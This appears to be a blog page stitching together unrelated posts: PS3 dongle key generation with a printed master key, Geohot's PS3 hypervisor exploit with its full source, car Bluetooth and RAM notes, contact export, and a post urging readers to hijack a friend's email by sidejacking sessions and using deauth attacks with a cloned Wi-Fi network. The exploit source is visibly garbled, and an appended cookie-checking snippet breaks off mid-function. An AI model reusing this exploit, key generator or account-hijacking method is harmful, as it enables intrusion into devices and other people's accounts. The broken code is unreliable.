X3MAX PS3 GIF – is not a fake after all: XTSE Creates PS3 Dongle ID Key Generator

I downloaded the compiled version of p3kgwn to see if there was any meaning to X3’s claim. You all remember that GIF image that everyone said was fake and no one could make sense of. Well, more progress has been made in the PS3 scene and I thought I’d help validate X3max. Thanks go out to Graf_Chokolo + Xtse for their work.

Below is the image and how to use the little app. It appears to be accurate. If you keep reading you will see why this is important.

[Image: X3 image deciphered. Image was taken from X3MAX.COM]

Originally Posted by Estx
Well, the master key is out and about now so here’s a convenient little application to generate your dongle id keys.

Straightforward to use.

p3kg – Xtse WINDOWS 2.0 Net Version

Code:
p3kgwn.exe 0xAAAB

Replacing 0xAAAB with whatever device ID you like.

http://www.mediafire.com/?oi8yaop8njrmi2n – download link for now

AFTER I TESTED THE APP IT TURNS OUT TO GIVE THE SAME RESULTS AS X3 CLAIMED.

C:\Users\Jeff\Desktop>p3kgwn 0x3BAD
p3kg (Windows .NET) – Xtse

Master Key
46 DC EA D3 17 FE 45 D8 09 23 EB 97 E4 95 64 10 D4 CD B2 C2

Device ID
3B AD

Device Key
2A 41 C2 93 F8 15 D8 91 65 6D C3 74 6D 0E 33 EC 7B 39 5B 92

A convenient JavaScript version has been made: http://www.teknoconsolas.es/usbdongle/usbdongle.html


Exporting Contacts from Palm Pre to HTC EVO

I just gave up on the Palm Pre. I got the HTC EVO for under 100 bucks after the trade-in of my Palm Pre and a Walmart 100 gift card.
Keep in mind I missed the 99 dollar deal from Amazon.com for the HTC EVO.
My first goal to prep the transition is to get my contacts fully exported and imported.
I found this post and well so far so good.

This is how to get your contacts from your Sprint Palm PRE. You can create a .vcf file to import into most email programs.
• Open phone dialer on PRE or Pixi
• Type ##66623#
• Click on Export
• This creates the export file (.vcf)….The more contacts you have the longer it takes
• Connect your USB cable to the computer and also to the PRE when it prompts you to.
• Click on the USB Drive on your pre to mount to computer
• Once mounted on your computer, open windows explorer and the Palm PRE
• Find the folder called temp and open it (if you don’t find a temp folder, open folder options/view/and choose show hidden files/ then OK)
• You will find a file called PmMigration (this is the vcf file)
• Drag to your documents folder on your computer (PRE Backup folder) if you have one
• Use this file to import your contacts into Gmail, Yahoo, Hotmail or Outlook
• When you’re done Eject your Palm pre or safely remove hardware and then disconnect pre
• You’re done….

Getting them to Gmail.
Follow the instructions in the above, and create the VCF file. Save it somewhere that it can easily be found. Go to Gmail and click on contacts, then in the upper right click on import. Import your VCF file. If it works it will tell you how many contacts it imported.

Once I got them to Gmail, it was easy to get them to Outlook as Gmail has a direct link to transfer contacts to Outlook.

To make this transfer use this link.
http://office.microsoft.com/en-us/outlook-help/transfer-contacts-between-outlook-and-google-gmail-HA010222048.aspx

Hope this works for all of you. This was the only way I was able to get it all to work, and from what I can tell all the contact info went through, including addresses, email and phone numbers.


Thank you for your time,
Heidi Mercer

“I do believe I am making an impact. I know that cancer’s worst enemy is money. It is money that will pay for research. It is money that will provide services for cancer patients. It is money that will eventually find a cure and end the suffering. What I like about Relay is that we raise thousands of dollars, one dollar at a time. If you have a dollar you can fight cancer. There’s nothing greater than that.” M.Starr

“When you think about it, what other choice is there but to hope? We have two options, medically and emotionally: give up, or Fight Like Hell.”
Lance Armstrong

Geohot’s PS3 exploit released 1.26.2010 PS3 HACKED

Geohot’s PS3 Exploit released for download

Geohot has released the exploit that will allow for the PS3 to be hacked. This is what the hacking community has been waiting for. Geohot’s PS3 exploit will have the console hacking scene raving in hours. This is not for the average user; only experienced hackers will be comfortable with this code.

[Quote]

“In the interest of openness, I’ve decided to release the exploit. Hopefully, this will ignite the PS3 scene, and you will organize and figure out how to use this to do practical things, like the iPhone when jailbreaks were first released. I have a life to get back to and can’t keep working on this all day and night.

Please document your findings on the psDevWiki. They have been a great resource so far, and with the power this exploit gives, opens tons of new stuff to document. I’d like to see the missing HV calls filled in, nice memory maps, the boot chain better documented, and progress on a 3D GPU driver. And of course, the search for a software exploit.

This is the coveted PS3 exploit, gives full memory access and therefore ring 0 access from OtherOS. Enjoy your hypervisor dumps. This is known to work with version 2.4.2 only, but I imagine it works on all current versions. Maybe later I’ll write up how it works

Good luck!”

Download Geohot’s PS3 exploit
http://geohotps3.blogspot.com/2010/01/heres-your-silver-platter.html

Download Geohot’s ps3 exploit in zip format

There are 5 files contained in the zip file, two of which are just instructions in the form of a picture and a .txt file.

The following is a list of the files in the .zip folder:

1. pokemehere.jpg
2. run.sh
3. exploit.c
4. makefile
5. instructions.txt

INSTRUCTIONS.TXT includes:
!!EXPLOIT IS FOR RESEARCH PURPOSES ONLY!!

Usage Instructions:

Compile and run the kernel module.

When the “PRESS THE BUTTON IN THE MIDDLE OF THIS” comes on, pulse the line circled in the picture low for ~40ns.
Try this multiple times, I rigged an FPGA button to send the pulse.
Sometimes it kernel panics, sometimes it lv1 panics, but sometimes you get the exploit!!
If the module exits, you are now exploited.

This adds two new HV calls,
u64 lv1_peek(16)(u64 address)
void lv1_poke(20)(u64 address, u64 data)
which allow any access to real memory.

The PS3 is hacked, its your job to figure out something useful to do with it.

http://geohotps3.blogspot.com/

exploit.c
// PS3 exploit code
// c2010 geohot
// I DO NOT CONDONE PIRACY, EXPLOIT IS FOR RESEARCH USE ONLY

#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include

#include

void hexdump(unsigned long *d, int l) {
int i;
for(i=0;i>12)&0xFFFFFFFFF;
}

#define LENGTH 0x1000000
#define COUNT 0x40

volatile unsigned long cache_clear[0x100000];

volatile int exploit_first_stage() {
unsigned long lpar, lpar2, crap, g1, glitch=0, status, i;
printk(KERN_ERR "allocate memory: %d\n", lv1_allocate_memory(0x100000, 0x14, 0, 0, &lpar, &crap));
printk(KERN_ERR "PRESS THE BUTTON IN THE MIDDLE OF THIS\n");

for(i=0;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
if( (g1 & 1) == 0 || (g1&0xFFFFFFFF00000000) == 0x0000FFFF00000000) {
// isn't valid or is previous crap
if(lv1_write_htab_entry(0,i,0x0000FFFF00000001|(i<<16) | ((((((i/8)^(((0x0000FFFF00000001|(i<>12) & 0x1FFF)) <>23)&0x1F)<<7) ,0x196|lpar) != 0) {
printk(KERN_ERR "bad HTAB write @ %X\n", i);
}
glitch++;
}
}
printk(KERN_ERR "added 0x%X HTAB entries\n", glitch);

volatile register unsigned long j, t1, t2, k, l;

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0, stack;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

// get craps in the icache
lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar2, &crap);
lv1_release_memory(lpar2);

for(j=0;j<LENGTH;j++) {
if(j==(LENGTH/2)) {
t1 = mftb();
status = lv1_release_memory(lpar);
t2 = mftb();
memset(cache_clear, 0xAA, 0x100000);
}
}

//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR "time was 0x%lx, 0x%x per, %d\n", t2-t1, (t2-t1)/glitch, status);

t1 = 0;
t2 = 0;

for(i=0;i0) {
printk(KERN_ERR "EXPLOIT ENTRY FOUND!!!!!\n");
return 0;
}

return -1;
}

unsigned long SLB[128];

// 64 entries in the SLB
inline int read_slb() {
unsigned long i, j;
unsigned long *entry;
for(i=0;i<64;i++) {
entry = &SLB[i*2];
__asm__ volatile("slbmfee 3, %0\n"
"std 3, 0(%1)\n"
"slbmfev 3, %0\n"
"std 3, 8(%1)\n"
:
: "r" (i), "r" (entry)
: "r3");
}
return 0;
}

// move into another virtual address space

unsigned long HTAB_0[0x20000];
unsigned long HTAB_1[0x20000];

volatile long hypercall_in_c() {
return 0x8FFFFFFEF;
}

volatile long call_hypercall_tlbia(unsigned long* r4) {
unsigned long ret;
unsigned long inr4 = *r4, outr4;
asm volatile("mr 3, %2\n"
"li 11, 16\n"
"sc 1\n"
"mr %0, 3\n"
"mr %1, 4\n"
: "=r" (ret), "=r" (outr4)
: "r" (inr4)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12" );
*r4 = outr4;
return ret;
}

volatile int exploit_second_stage() {
unsigned long crap, j, slb1, slb2, msr, hsprg0;
unsigned long i, g1, g2, status, raff_ptr;
unsigned long vas_id, old_vas_id;
unsigned long act_htab_size;
//2, (24<<56)|(16<<48)
printk(KERN_ERR "construct address space: %d\n", lv1_construct_virtual_address_space(20, 2, 0x1814000000000000, &vas_id, &act_htab_size));
lv1_get_virtual_address_space_id_of_ppe(0, &old_vas_id);
printk(KERN_ERR "address space is %d, old was %d\n", vas_id, old_vas_id);
if(vas_id == 0) {
printk(KERN_ERR "ADDRESS SPACE FAIL\n");
return 0;
}

read_slb();
for(i=0;i>27)&1) {
printk(KERN_ERR "%lx %lx\n", SLB[i*2]&0xFFFFFFFFF0000000, SLB[(i*2)+1]>>12);
}
}
//hexdump(SLB, 128);

unsigned long htab_lpar;
lv1_map_htab(0, &htab_lpar);
unsigned long htab_ra = get_real_address_from_lpar(htab_lpar);

unsigned long other_htab_lpar;
lv1_map_htab(vas_id, &other_htab_lpar);
unsigned long* other_htab = __ioremap(other_htab_lpar, 0x100000, 3);
unsigned long other_htab_ra = get_real_address_from_lpar(other_htab_lpar);

printk(KERN_ERR "fix values are %lx %lx\n", other_htab_lpar, vas_id);

// add the messed up one
for(raff_ptr=0;raff_ptr>12) == 0x400) ) {
printk(KERN_ERR "FOUND ENTRY %16.16lx %16.16lx @ %X\n", g1, g2, raff_ptr);
break;
}
}
if(raff_ptr==0x10000) {
printk(KERN_ERR "EXPLOIT NOT FOUND\n");
goto hard_die;
}

if(other_htab_ra != ((g2&0xFFFF000)>>12) ) {
printk(KERN_ERR "BAD ADDRESS OF REGIONS HTAB\n");
goto die;
}

// add the segment
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
//slb2 = 0x0000FFFF00000400|(raff_ptr<>12) & 0x1FFF)) <>2)&1)?24:12);
printk(KERN_ERR "computed VA is %lx\n", va);

unsigned long* other_htab_rw = va;
other_htab_rw[0] = 0x0000FFFF00000001;
other_htab_rw[1] = 0x0000000000000196|(htab_ra< %lx\n", usb1_ra);
printk(KERN_ERR "0x4000001e0000 -> %lx\n", usb2_ra);
printk(KERN_ERR "0x4000001f0000 -> %lx\n", usb3_ra);
printk(KERN_ERR "0x400000200000 -> %lx\n", usb4_ra);

// skip first entry, it’s mine and important
for(i=1;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
g2 = ((unsigned long*)0xD000080080000000)[(i*2)+1];
if(g1&1) {
unsigned long va = 0xFFFFFFFFFFFFFFFF, ra;
for(j=0;j>27)&1) {
if((SLB[(j*2)+1]>>12) == (g1>>12)) {
va = SLB[j*2]&0xFFFFFFFFF0000000;
}
}
}
if(va == 0xFFFFFFFFFFFFFFFF) {
continue;
//printk(KERN_ERR "ENTRY NOT FOUND IN SLB: %lx\n", (g1>>12));
}
valid_count++;

va |= ((i/8)^((g1>>(7+5)) & 0x1FFF)) <>2)&1)?24:12);
ra = g2 >> 12;

my_lpar = 0xFFFFFFFFFFFFFFFF;

if( ra >= 0x1000 && ra = 0x8000 ) {
my_lpar = (ra-0x8000) << 12;
} else {
my_lpar = 0x6c0058000000 | ((ra-0x1000)<<12);
}
} else if( (ra&0xFFFFFFFFFFFFFF00) == htab_ra) {
my_lpar = htab_lpar + ((ra-htab_ra) << 12);
} else if( (ra&0xFFFFFFFFFFFFFF00) == other_htab_ra) {
my_lpar = other_htab_lpar + ((ra-other_htab_ra) <= 0x28000080 && ra %lx\n", i, g1, g2, va, ra);
}

if(other_htab[i*2] != g1 || other_htab[(i*2)+1] != g2) {
printk(KERN_ERR "verify failed on %X\n", i);
printk(KERN_ERR "%lx %lx — %lx %lx\n", g1, g2, other_htab[i*2], other_htab[(i*2)+1]);
//goto home;
}
}
}

printk(KERN_ERR "wrote 0x%X/0x%X htab entries\n", count, valid_count);

hexdump(other_htab, 4);
printk(KERN_ERR "OOO R/W\n");
hexdump(other_htab_rw, 4);

// add the segment different
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000400;
__asm__ volatile("slbmte %0, %1\n"
:
: "r" (slb2), "r" (slb1) );

printk(KERN_ERR "GOING UNDERCOVER\n");

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

status = lv1_select_virtual_address_space(vas_id);

// OMG, CRAZY, IN OTHER SPACE
unsigned long* htab_rw = 0x5000000000000000;
// middle part is 0 cause in position 0

// add htab r/w to itself
htab_rw[2] = 0x0000FFFF00000005;
htab_rw[3] = 0x0000000000000196;

lv1_select_virtual_address_space(old_vas_id);
//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR "prease i lived?!?!?: %d\n", status);

// add the segment different again
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile("slbmte %0, %1\n"
:
: "r" (slb2), "r" (slb1) );

home:
printk(KERN_ERR "unmap other HTAB: %d\n", lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR "destruct address space: %d\n", lv1_destruct_virtual_address_space(vas_id));

hexdump(0xD000080080000000, 0x10);

return 0;
die:
printk(KERN_ERR "unmap other HTAB: %d\n", lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR "destruct address space: %d\n", lv1_destruct_virtual_address_space(vas_id));
return -1;
hard_die:
printk(KERN_ERR "unmap other HTAB: %d\n", lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR "destruct address space: %d\n", lv1_destruct_virtual_address_space(vas_id));
return -2;
}

void add_segment() {
// add the segment different again
unsigned long crap, j, slb1, slb2;
crap = 0x5000000000000000;
__asm__ volatile("slbie %0\n"
:
: "r" (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile("slbmte %0, %1\n"
:
: "r" (slb2), "r" (slb1) );
}

volatile long lv1_peek(unsigned long real_addr) {
unsigned long ret;
asm volatile("mr 3, %1\n"
"li 11, 16\n"
"sc 1\n"
"mr %0, 3\n"
: "=r" (ret)
: "r" (real_addr)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12");
return ret;
}

volatile long lv1_poke(unsigned long real_addr, unsigned long data) {
unsigned long ret;
asm volatile("mr 4, %2\n"
"mr 3, %1\n"
"li 11, 20\n"
"sc 1\n"
"mr %0, 3\n"
: "=r" (ret)
: "r" (real_addr), "r" (data)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12");
return ret;
}

void install_hypercall() {
unsigned long lpar, crap;

hexdump(0xD000080080000000, 0x10);

if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
printk(KERN_ERR "killer entry NOT present\n");
return 0;
}

printk(KERN_ERR "allocate memory: %d\n", lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar, &crap));
unsigned long* hypercall_in_zero_page = __ioremap(lpar, 0x1000, PAGE_SHARED_X);

hypercall_in_zero_page[0] = 0xE86300004E800020;
hypercall_in_zero_page[1] = 0xF883000038600000;
hypercall_in_zero_page[2] = 0x4E80002000000000;

unsigned long real_address = get_real_address_from_lpar(lpar)<<12;

add_segment();
unsigned long* hv_call_table = 0x500000000037C598;
hv_call_table[16] = real_address;
hv_call_table[20] = real_address+0x8;
printk(KERN_ERR "calling hypercall test got %16.16lx\n", lv1_peek(0x2401FC00000));
}

volatile int init_module() {
if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
while(exploit_first_stage() == -1);
while(exploit_second_stage() == -1);
}
install_hypercall();
return 0;
}

void cleanup_module(void) {
printk(KERN_ERR "cleanup_module() called\n");
}

~geohot
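
The three 64-bit constants that install_hypercall() stores in hypercall_in_zero_page are PowerPC machine code, and decoding them shows why table slot 16 reads memory and slot 20 writes it. The decoder below is an added example for analysis, not part of geohot's release; the function names ppc_decode and stub_routine are made up here, and only the four instruction encodings present in those constants are handled.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The three words exploit.c stores in hypercall_in_zero_page[] (copied from the page). */
static const uint64_t STUB[3] = {
    0xE86300004E800020ULL,
    0xF883000038600000ULL,
    0x4E80002000000000ULL,
};

/* Decode one 32-bit PowerPC instruction into text. Only the encodings
 * that occur in STUB are recognised; anything else is emitted as raw
 * data. Returns 1 when the word was recognised, 0 otherwise. */
int ppc_decode(uint32_t insn, char *out, size_t len)
{
    unsigned op = insn >> 26;            /* primary opcode, bits 0-5 */
    unsigned rt = (insn >> 21) & 31;     /* RT / RS field            */
    unsigned ra = (insn >> 16) & 31;     /* RA field                 */
    int d = (int16_t)(insn & 0xFFFF);    /* signed 16-bit immediate  */

    if (op == 58 && (insn & 3) == 0) {           /* DS-form ld  */
        snprintf(out, len, "ld r%u,%d(r%u)", rt, d & ~3, ra);
    } else if (op == 62 && (insn & 3) == 0) {    /* DS-form std */
        snprintf(out, len, "std r%u,%d(r%u)", rt, d & ~3, ra);
    } else if (op == 14 && ra == 0) {            /* addi with RA=0 is li */
        snprintf(out, len, "li r%u,%d", rt, d);
    } else if (insn == 0x4E800020u) {            /* bclr 20,0: plain return */
        snprintf(out, len, "blr");
    } else {
        snprintf(out, len, ".long 0x%08X", (unsigned)insn);
        return 0;
    }
    return 1;
}

/* Disassemble the routine that starts at byte offset off inside STUB and
 * stop after its first blr. The PS3 is big-endian, so the high half of
 * each 64-bit word is the instruction at the lower address. Instructions
 * are joined with "; ". Returns the number of instructions decoded. */
int stub_routine(unsigned off, char *out, size_t len)
{
    int n = 0;
    out[0] = '\0';
    for (; off + 4 <= sizeof STUB; off += 4) {
        uint64_t w = STUB[off / 8];
        uint32_t insn = (off % 8) ? (uint32_t)w : (uint32_t)(w >> 32);
        char one[32];

        ppc_decode(insn, one, sizeof one);
        if (n++)
            strncat(out, "; ", len - strlen(out) - 1);
        strncat(out, one, len - strlen(out) - 1);
        if (insn == 0x4E800020u)
            break;
    }
    return n;
}

int main(void)
{
    char buf[64];

    /* hv_call_table[16] = real_address      (lv1_peek) */
    stub_routine(0, buf, sizeof buf);
    printf("slot 16 (+0x0): %s\n", buf);
    /* hv_call_table[20] = real_address + 8  (lv1_poke) */
    stub_routine(8, buf, sizeof buf);
    printf("slot 20 (+0x8): %s\n", buf);
    return 0;
}
```

The first routine loads the doubleword at the address passed in r3 and returns it in r3; the second stores r4 at that address and returns 0, which matches the lv1_peek and lv1_poke wrappers in exploit.c.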

Pontiac G8 GT 2009 Bluetooth Addition OEM Install

If you have come across this blog then you are in the same boat as me. You have purchased the 2009 G8 GT and realized that you do not have the Bluetooth that you were hoping for. There has been some breakthrough recently and I have compiled tons of data to help those of you in need of help. I have asked 3 important questions and here are my findings. G8 community is great for information.

Resource link- http://www.g8board.com/forums/showpost.php?p=404735&postcount=202
Chris – AKA GTPprix runs the site www.whiteautoandmedia.com and he can perform the flash if you find a BT box. You would ship your unit to Chris and he will flash it and send it back.

http://www.whiteautoandmedia.com/index.php?page=shop.browse&category_id=27&option=com_virtuemart&Itemid=54

The Three Questions that I asked are:

Q. How is the quality of the BT in the car. Can the other person tell you are on BT? I know that the ford sync bt is crap when it calls to a landline at work.
A. So far everyone has been raving that the sound is great!  Quotes: The BT quality, in my opinion, is excellent. I can hear the caller perfectly (sometimes it takes adjusting the volume), and whenever I tell someone “by the way, you’re on speaker”, they respond with “oh, it doesn’t seem like it”. The quality of your cell connection is what matters – a poor connection obviously yields poor results.

Q. What vehicles can I search for that have the two modules that work? GM Part # 25984444 and its superseding part 20783877 are the ONLY two modules. It is believed that 25984444 is the original part they used when they first introduced the Bluetooth option. It is no longer available. 20783877 is the updated part that has some software revisions to help it be more compatible with vehicles that have the factory in-dash navigation systems. The original module made some of the navigation features not function. When calling a junkyard, the results may turn up as “Communication, OnStar (opt UEl), (left side of dash)” or “Communication, (left 1/4 wheelhouse)”. Both have ID 25984444. Do not despair: the descriptions are just the placements on different vehicles, and you should have no problems with either. * Don’t blame me if they don’t.
A. 2009 Model Year Acadia/Enclave/Outlook/Traverse/Sierra/Silverado/Tahoe/Suburban/Yukon
Results from the forums are “Ok, I did some experimenting, bought a GM p/n #25984444 from a different vehicle (09 Buick Acadia, I called around to local junkyards), bought the Bluetooth antenna from the dealer ($40)”

Q. What is the Bluetooth Antenna that is needed?
A. Part Number 15938939 is a 1″ x 1/2″ plug in bluetooth antenna that goes right onto the Onstar box. It is not the roof antenna or anything else. It is very small and fragile.

GM PART # 15938939 – GMPARTSDIRECT.com
CATEGORY: Power Radio Antenna Module
PACK QTY: 1
CORE CHARGE: $0.00
GM LIST: $39.02
OUR PRICE: $23.13

Q. What did you pay for your 25984444.
A. Junkyard charged $120 for the module 20783877. Junkyard wanted 310 for 25984444. Your mileage may vary.

Q. Has anyone taken install pics of the new unit and the antenna etc?
A. Working on getting someone to post these. Or I will take images when I get retrofitted.
http://www.g8board.com/forums/showpost.php?p=245182&postcount=59
Images… I will post here as a mirror.

Q. Does your Onstar # change?
A. Mine actually changed twice, once during setup and once sometime between setup and now. What is ironic is that my original, stock # was a 203 area code, and the updated 2 numbers are 860 area codes (those are CT’s two major codes, they recently added more).

Q. Do you still get the Onstar emails that come monthly.
A. The Onstar emails still come monthly. The month that I did the swap, it came a little late (I imagine they redid the cycle in their system or something). I get the warning “action suggested” on my engine & transmission system and the emissions system, but GTPPrix described a possible fix for this somewhere that I have yet to try.

Disclaimer: Regarding finding a box – those who find them are either lucky or clever. Many junkyards, especially smaller ones, don’t carefully inventory all of the boxes they get. They simply label them “computer module”, and some even toss them because they can be a lot of trouble to match up with exact software revisions and date codes. Also, remember that many people entering the parts into the database may not be the brightest bulbs on the planet, so they are prone to put in incorrect part numbers or even omit information. My advice on this is to find all of the yards you can with any 09 vehicle with the box and have them actually look at the car or parts to find it. These have to still exist out there; not everyone in an 09 GM is a good and lucky driver.

EVGA 750i FTW approved Memory List

780i/750iFTW/680i Series Memory Support

SLI Ready Memory

Above 1066 MHz(Above PC2 8500)
Corsair TWIN2X2048-10000C5DF
Corsair TWIN2X2048-9136C5DF
Corsair TWIN2X2048-8888C4DF

1066 MHz(PC2 8500)
OCZ OCZ2N10662GK
OCZ OCZ2N10661G
Corsair TWIN2X2048-8500C5D
Corsair TWIN2X2048-8500C5
Kingston KHX8500D2K2/1G
OCZ OCZ2N1066SR2GK
OCZ OCZ2N1066SR1G
PNY D22GX85GMR

900 MHz(PC2 7200)
OCZ OCZ2N900SR2GK
OCZ OCZ2N900SR1G
OCZ OCZ2N9002GK
OCZ OCZ2N9001G

800 MHz(PC2 6400)
Corsair TWIN2X2048-6400C3DF
Corsair TWIN2X2048-6400C4D
Crucial BL2KIT12864AL804
Crucial BL12864AL804
Crucial BL2KIT12864AA804
Crucial BL2KIT6464AA804
Crucial BL12864AA804
Crucial BL6464AA804
Kingston KHX6400D2LLK2/2GN
Kingston KHX6400D2LLK2/1GN
Patriot PDC22G6400LLK
PNY D22GX64GMR-4

Standard Memory

Above 800 MHz(Above PC2 6400)
Kingston KHX9600D2K2/2G
Kingston KHX9200D2/512
Kingston KHX8000D2K2/2G
Kingston KHX7200D2K2/2G
Patriot PDC21G8000+XBLK
Patriot PDC21G8500 ELK
Crucial BL2KIT12864AL1005
G.SKILL F2-8000CL5D-4GBPQ
Mushkin XP2-1066

800 MHz(PC2 6400)
Mushkin XP-6400
Mushkin XP2-6400
OCZ OCZ2G8002GK
OCZ OCZ2P800R21G
OCZ OCZ2T8002GK
Corsair CGM2X1G800 G
Corsair CGM2X2G800 G
Corsair XMS6405v4.1
Corsair TWIN2X2048-6400
G.Skill F2-6400PHU2-2GBHZ
G.Skill F2-6400PHU2-2GBNR
G.SKILL F2-6400CL4D-2GBPK
G.SKILL F2-6400CL5D-4GBPQ
Team Xtreem PC2-6400 800MHz 3-3-3-8
Team Xtreem PC2-6400 800MHz 4-4-4-10
Patriot PDC22G6400ELK
Geil Ultra GX22GB6400UDC
Super Talent T800UX2GC4

667 MHz(PC2 5400)
Corsair VS512MB667D2
Buffalo D2V667C-1G/BJ
Patriot PDC21G5300LLK
PQI 5400 Turbo
Kingston KHX5400D2K2/1G
Geil GX21GB5300SX
Mushkin xp2 5300 2x1gb
Mushkin HP2-5300

533 MHz(PC2 4200)
Kingston KVR533D2/512R
PQI MAB412UOE 512MB DDR2 533
OCZ DDR2 OCZ2533512V

Email hacking for 2010.

I can remember the days when I learned about brute-force hacking. It was simple: learn everything you can about your person of interest and use it to gain access to their email.

I attempted this on my brother and it worked, and soon people would ask “dude can you hack someone’s email for me”.
Those are the old days and we have evolved and use more secure passwords with numbers and stuff…RIGHT!!!

Well, after reading about Jasager and the La Fonera I’ve been following it up with some new programs that focus on sidejacking. These tools are named Hamster and Ferret.
http://erratasec.blogspot.com/2009/03/hamster-20-and-ferret-20.html
http://hamster.erratasec.com/

The concepts are amazing and are not new to someone who focuses on this stuff every day, but for me it’s new. Let’s say someone is using your wifi spot and you start to watch their sessions. We know all sessions have cookies. Well, you can grab this cookie info and inject it into your own browser and view the same sites.

http://blogs.zdnet.com/Ou/?p=651

So how could you do this to your best friend who is smarter than you and has his own WPA network and won’t be using some free wifi… well, you use the Jasager tool on the La Fonera. You use something called a deauth attack with tools like Aircrack-ng, which basically kicks your buddy off the wifi; then he will join your fake network because you have cloned his SSID.

Meet Der Jasager, the “yes man” VIDEO

http://www.viddler.com/player/1b5f260d

Once you get a fresh install on the Fonera, Jasager should be installed. Try hitting it at http://192.168.1.1:1471

I’ll have more later with my results of playing tricks locally.

I wanted to update this post and put more references to some other great resources to read.

Hak 5 forums have many people playing with the Jasager project. I suggest you read as many posts as you can before you attempt this hack.
http://hak5.org/forums/index.php?showtopic=10254&st=0&gopid=147536&#entry147536

HIR is a new website that I found with some good documentation on the Jasager installation if you are wanting to go a different route to flash.
http://www.h-i-r.net/2009/07/evil-wifi-part-1-jasagerfonera-setup.html
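
Sidejacking as described above only works on cookies that the browser is willing to send over an unencrypted connection, which is what the Secure cookie attribute prevents. The checker below is an added example written for this page, not taken from Hamster, Ferret or Jasager; it scans a block of HTTP response headers and names the cookies set without Secure. The sample response and the function name sniffable_cookies are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive compare of the first n bytes of s with lower-case word w. */
static int ieq(const char *s, size_t n, const char *w)
{
    size_t i;
    if (n != strlen(w)) return 0;
    for (i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != w[i]) return 0;
    return 1;
}

/* Return 1 if the Set-Cookie value in [v, end) has no Secure attribute.
 * The first ';'-separated field is name=value and is skipped, so a cookie
 * that is merely named "secure" does not count as protected. */
static int lacks_secure(const char *v, const char *end)
{
    const char *p = memchr(v, ';', (size_t)(end - v));
    while (p) {
        const char *a = p + 1;
        size_t n = 0;
        while (a < end && (*a == ' ' || *a == '\t')) a++;
        p = memchr(a, ';', (size_t)(end - a));
        while (a + n < (p ? p : end) && a[n] != '=' && a[n] != ' ') n++;
        if (ieq(a, n, "secure")) return 0;
    }
    return 1;
}

/* Scan HTTP response headers and write the names of cookies that would
 * also be sent over plain HTTP into out, comma-separated.
 * Returns how many such cookies were found. */
int sniffable_cookies(const char *headers, char *out, size_t len)
{
    int count = 0;
    const char *line = headers;
    out[0] = '\0';
    while (*line) {
        const char *eol = strchr(line, '\n');
        const char *end = eol ? eol : line + strlen(line);
        const char *next = eol ? eol + 1 : end;
        if (end > line && end[-1] == '\r') end--;      /* strip CR of CRLF */
        if ((size_t)(end - line) > 11 && ieq(line, 11, "set-cookie:")) {
            const char *v = line + 11;
            while (v < end && *v == ' ') v++;
            if (lacks_secure(v, end)) {
                size_t nlen = 0, used = strlen(out);
                while (v + nlen < end && v[nlen] != '=' && v[nlen] != ';') nlen++;
                if (used + nlen + 2 < len) {           /* room for ',' name NUL */
                    if (count) out[used++] = ',';
                    memcpy(out + used, v, nlen);
                    out[used + nlen] = '\0';
                }
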